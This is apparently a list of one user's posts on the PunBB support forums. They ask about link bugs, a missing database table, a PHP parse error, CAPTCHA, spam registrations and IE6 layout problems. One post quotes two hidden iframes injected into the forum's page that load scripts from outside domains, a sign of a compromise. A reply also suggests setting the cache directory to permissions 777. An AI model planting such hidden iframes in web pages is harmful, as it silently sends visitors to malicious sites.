1

(2 replies, posted in PunBB 1.4 troubleshooting)

Solved the problem, thank you very much!

2

(2 replies, posted in PunBB 1.4 troubleshooting)

Since I updated to 1.4.3 I have a problem with links. Example: when I click on a link in a list, I get this url:

http://nameofsite.com/%22http:/www.nameofsite.com/forum/viewtopic.php?id=2%22

The url of the site is placed in front of the url of the link. Any solutions?

Is there a solution for this problem?

I only have this problem when the link is in a list (since 1.4.3). Example: when the link is in a list (numbered or bullet) and I click on it, I get this url:

http://nameofsite.com/%22http:/www.nameofsite.com/forum/viewtopic.php?id=2%22

Resolved: after a long day I managed to solve the problem.

I have a problem with my forum. I can go to the index-page but when I click on a link, I get this message (I already turned "debug" in the config.php-file on):

Sorry! The page could not be loaded.

This is probably a temporary error. Just refresh the page and retry. If problem continues, please check back in 5-10 minutes.

Database reported: Table 'vannijvel_forum.fancy_alerts_topics' doesn't exist (Errno: 1146).

Failed query: SELECT COUNT(*) AS num_alerts FROM fancy_alerts_topics AS fat LEFT JOIN topics AS t ON (t.id=fat.topic_id) LEFT JOIN forum_perms AS fp ON (fp.forum_id=t.forum_id AND fp.group_id=1) WHERE fat.user_id=2 AND fat.last_post_id!=0 AND fat.last_post_time > fat.last_user_view AND (fp.read_forum IS NULL OR fp.read_forum=1)

The error occurred on line 158 in /var/www/vhosts/bendevannijvel.com/httpdocs/forum/extensions/fancy_alerts/functions.inc.php

Any solutions?

6

(2 replies, posted in PunBB 1.4 troubleshooting)

I've found this topic about version 1.3 but it doesn't really give an answer: http://punbb.informer.com/forums/topic/ … ser-merge/

So I'm still looking for a solution.

7

(2 replies, posted in PunBB 1.4 troubleshooting)

I use PunBB 1.4.2 and I'm looking for an extension or a method to merge 2 users. There is an extensions for version 1.2 but it doesn't work.

Thanks in advance!

<?php

// Language definitions used in various scripts
$lang_misc = array(

'Mark read redirect'        =>    'All topics and forums have been marked as read. Redirecting …',

// Send e-mail
'Form e-mail disabled'        =>    'The user you are trying to send an e-mail to has disabled form e-mail.',
'No e-mail subject'            =>    'You must enter a subject.',
'No e-mail message'            =>    'You must enter a message.',
'Too long e-mail message'    =>    'Messages cannot be longer than 65535 characters (64 KB).',
'E-mail sent redirect'        =>    'E-mail sent. Redirecting …',
'Send e-mail to'            =>    'Send e-mail to',
'E-mail subject'            =>    'Subject',
'E-mail message'            =>    'Message',
'E-mail disclosure note'    =>    'Please note that by using this form, your e-mail address will be disclosed to the recipient.',
'Write e-mail'                =>    'Write and submit your e-mail message',

// Report
'No reason'                    =>    'You must enter a reason.',
'Report redirect'            =>    'Post reported. Redirecting …',
'Report post'                =>    'Report post',
'Reason'                    =>    'Reason',
'Reason desc'                =>    'Please enter a short reason why you are reporting this post',

// Subscriptions
'Already subscribed'        =>    'You are already subscribed to this topic.',
'Subscribe redirect'        =>    'Your subscription has been added. Redirecting …',
'Not subscribed'            =>    'You are not subscribed to this topic.',
'Unsubscribe redirect'        =>    'Your subscription has been removed. Redirecting …',

// General forum and topic moderation
'Moderate'                    =>    'Moderate',
'Select'                    =>    'Select',    // the header of a column of checkboxes
'Move'                        =>    'Move',
'Delete'                    =>    'Delete',

// Moderate forum
'Open'                        =>    'Open',
'Close'                        =>    'Close',
'Move topic'                =>    'Move topic',
'Move topics'                =>    'Move topics',
'Move legend'                =>    'Select destination of move',
'Move to'                    =>    'Move to',
'Leave redirect'            =>    'Leave redirect topic(s)',
'Move topic redirect'        =>    'Topic moved. Redirecting …',
'Move topics redirect'        =>    'Topics moved. Redirecting …',
'Confirm delete legend'        =>    'Please confirm deletion',
'Delete topics'                =>    'Delete topics',
'Delete topics comply'        =>    'Are you sure you want to delete the selected topics?',
'Delete topics redirect'    =>    'Topics deleted. Redirecting …',
'Open topic redirect'        =>    'Topic opened. Redirecting …',
'Open topics redirect'        =>    'Topics opened. Redirecting …',
'Close topic redirect'        =>    'Topic closed. Redirecting …',
'Close topics redirect'        =>    'Topics closed. Redirecting …',
'No topics selected'        =>    'You must select at least one topic for move/delete/open/close.',
'Stick topic redirect'        =>    'Topic sticked. Redirecting …',
'Unstick topic redirect'    =>    'Topic unsticked. Redirecting …',

// Delete multiple posts in topic
'Delete posts'                =>    'Delete posts',
'Delete posts comply'            =>    'Are you sure you want to delete the selected posts?',
'Delete posts redirect'            =>    'Posts deleted. Redirecting …',
'No posts selected'            =>    'You must select at least one post to be deleted.'

,
// Mass post management
'Erreur action'            =>    'Error: The wished action isn\'t available',
'Erreur posts selection'    =>    'Error: You haven't select any post',
'Deplacer posts'        =>    'Move posts',
'Choisir topic'            =>    'Choose the destination topic',
'Topic destination'        =>    'Destination topic URL',
'Avertissement date'        =>    'Apply the current date to display the posts at the bottom (in the contrary case, the order of publication will be respected)<br /><br /><strong>Caution</strong>, the oldest posts than the topic destination will be automatically placed at the end of this one.',
'Deplacer posts ok'        =>    'Move',
'Erreur topic destination'    =>    'Error: The destination topic URL isn't valid',
'Posts deplaces'        =>    'The posts were indeed moved',
'Supprimer posts'        =>    'Delete posts',
'Confirmer'            =>    'Confirm',
'Confirmer suppression'        =>    'Confirm to delete the selected posts ?',
'Supprimer posts ok'        =>    'Delete',
'Posts supprimes'        =>    'The posts were indeed deleted',
'Fusionner posts'        =>    'Amalgamate posts',
'Separer fusion'        =>    'Separate the posts by',
'Avertissement fusion'        =>    '<strong>Note :</strong> The finally post will have the most older post informormations.',
'Fusionner posts ok'        =>    'Amalgamate',
'Posts fusionnes'        =>    'The posts were indeed amalgamated'
);

You did not modify misc.php properly. i.e. you did not replace but just add the new code

I don't understand. At the end of misc.php I had to replace ); by :

,
// Mass post management
'Erreur action'            =>    'Error: The wished action isn\'t available',
'Erreur posts selection'    =>    'Error: You haven't select any post',
'Deplacer posts'        =>    'Move posts',
'Choisir topic'            =>    'Choose the destination topic',
'Topic destination'        =>    'Destination topic URL',
'Avertissement date'        =>    'Apply the current date to display the posts at the bottom (in the contrary case, the order of publication will be respected)<br /><br /><strong>Caution</strong>, the oldest posts than the topic destination will be automatically placed at the end of this one.',
'Deplacer posts ok'        =>    'Move',
'Erreur topic destination'    =>    'Error: The destination topic URL isn't valid',
'Posts deplaces'        =>    'The posts were indeed moved',
'Supprimer posts'        =>    'Delete posts',
'Confirmer'            =>    'Confirm',
'Confirmer suppression'        =>    'Confirm to delete the selected posts ?',
'Supprimer posts ok'        =>    'Delete',
'Posts supprimes'        =>    'The posts were indeed deleted',
'Fusionner posts'        =>    'Amalgamate posts',
'Separer fusion'        =>    'Separate the posts by',
'Avertissement fusion'        =>    '<strong>Note :</strong> The finally post will have the most older post informormations.',
'Fusionner posts ok'        =>    'Amalgamate',
'Posts fusionnes'        =>    'The posts were indeed amalgamated'
);

And that is what I did.

I tried today to include this (punres.org) on my forum but when I tested it I got this error :

Parse error: syntax error, unexpected T_STRING, expecting ')' in /home/vannijvel/domains/bendevannijvel.com/public_html/forum/lang/English/misc.php on line 70

Any ideas?

My forum : www.bendevannijvel.com/forum/

11

(2 replies, posted in PunBB 1.2 troubleshooting)

I think my forum has been hacked, between my last <div> and <body>, you can see this :

</div>
<iframe src='http://pls.3mzclk.cn/redirect1.php' style='display:none'></iframe><iframe src='http://aliciasilvestersdt.cc/circuit1.php' style='display:none'></iframe>
</body>

I asked my provider what to do about it, and they told me that it wasn't dangerous and I can just delete 'it'. But I don't know how to delete it and where I have to search for it?

Can somebody please help me? I'm still running 1.2.15 because I didn't had time to update yet. I'm going to do it as soon as possible.

chmod -R 777 [/path/to/cachedir]

I don't know a lot about PHP so I don't know what to do with this. Can you please give me more information.

Thank you!

Nobody can help me?

The CAPTCHA box doesn't seem to work on my forum. I have version 1.2.15 of PunBB.

Dont let your users pic there own password.

I have tried to do this, but when I want to save the changes I made I get this error :

An error was encountered
Error: Unable to write configuration cache file to cache directory. Please make sure PHP has write access to the directory 'cache'.

I really need more security because today I had a new 'fake-ID' who posted porn on my forum.

And how can I do this :

http://i19.servimg.com/u/f19/11/22/12/24/contro10.jpg

I took this picture from another PunBB-forum. You have to give a code before you can register.

I have been running a PunBB-forum for a couple of months but lately three 'fake'-id's have been created and they post links to porn-sites and other annoying stuff.

If you want to subscribe to my forum, you only have to give a name, a password and an e-mailadress. How can I make it happen that there is more security to register to the forum?

Hello,

I'm looking for a script (probably PHP) that automaticly shows the new topics and posts on the Index/Home-page of my website. Are there people who use such a script or know where to find one!

I use - of course - a PunBB-forum and this is my website : www.bendevannijvel.com

18

(0 replies, posted in PunBB 1.2 troubleshooting)

My forum has been built in my website. The website used to be 740px wide, but I changed it to 800 px. Now I have a problem when you visit the website in IE6. See photo :

http://i21.servimg.com/u/f21/11/22/12/24/forum10.png

As you can see, the titles of the topics have dropped one line!

19

(6 replies, posted in PunBB 1.2 troubleshooting)

That solved the problem. But now I have one problem in IE6. In forum/index the text isn't standing next to the squares. In all the other browsers I don't have that problem. See the picture :

http://i19.servimg.com/u/f19/11/22/12/24/forum_10.jpg

As you can see, the text isn't standing at the same line as the squares.

20

(6 replies, posted in PunBB 1.2 troubleshooting)

Smartys wrote:

According to the Developer Toolbar for IE, <p class="conr"> is set to 60% width and <dl id="searchlinks" class="conl"> is set to 55% width. That's the issue.

And how do I solve the problem? In my CSS from my website I also have thing called 'footer'. Can that be the problem?

21

(6 replies, posted in PunBB 1.2 troubleshooting)

I integrated my forum in my website, which is 740px wide. In Safari and Firefox, my forum is correct, but in IE6 I have a problem. At the bottom of my forum there is a scrollbar, see this picture :

http://i19.servimg.com/u/f19/11/22/12/24/bottom10.jpg

I don't know how to solve this problem. You can find my forum at www.bendevannijvel.com/forum/index.php

22

(0 replies, posted in PunBB 1.2 troubleshooting)

My forum is built in my website (see: www.bendevannijvel.com/forum/index.php), and my website is 740px wide. So sometimes, when a title is to long, you get this effect :

http://i20.servimg.com/u/f20/11/22/12/24/forum10.jpg

How can I change it so the title is on one line and not one two lines?

23

(9 replies, posted in PunBB 1.2 troubleshooting)

Thanks, most people visit my site using IE7, so that was a major problem. Again, thanks for the help.

24

(9 replies, posted in PunBB 1.2 troubleshooting)

I deleted the code.

25

(9 replies, posted in PunBB 1.2 troubleshooting)

So, if I have it right, I just have to delete this line of code and the problem will be solved.

 /* IEWin Font Size only - to allow IEWin to zoom. Do not remove comments \*/
* HTML .pun {FONT-SIZE: 68.75%}
/* End IE Win Font Size */

I'm asking this because I can't check it if I delete it.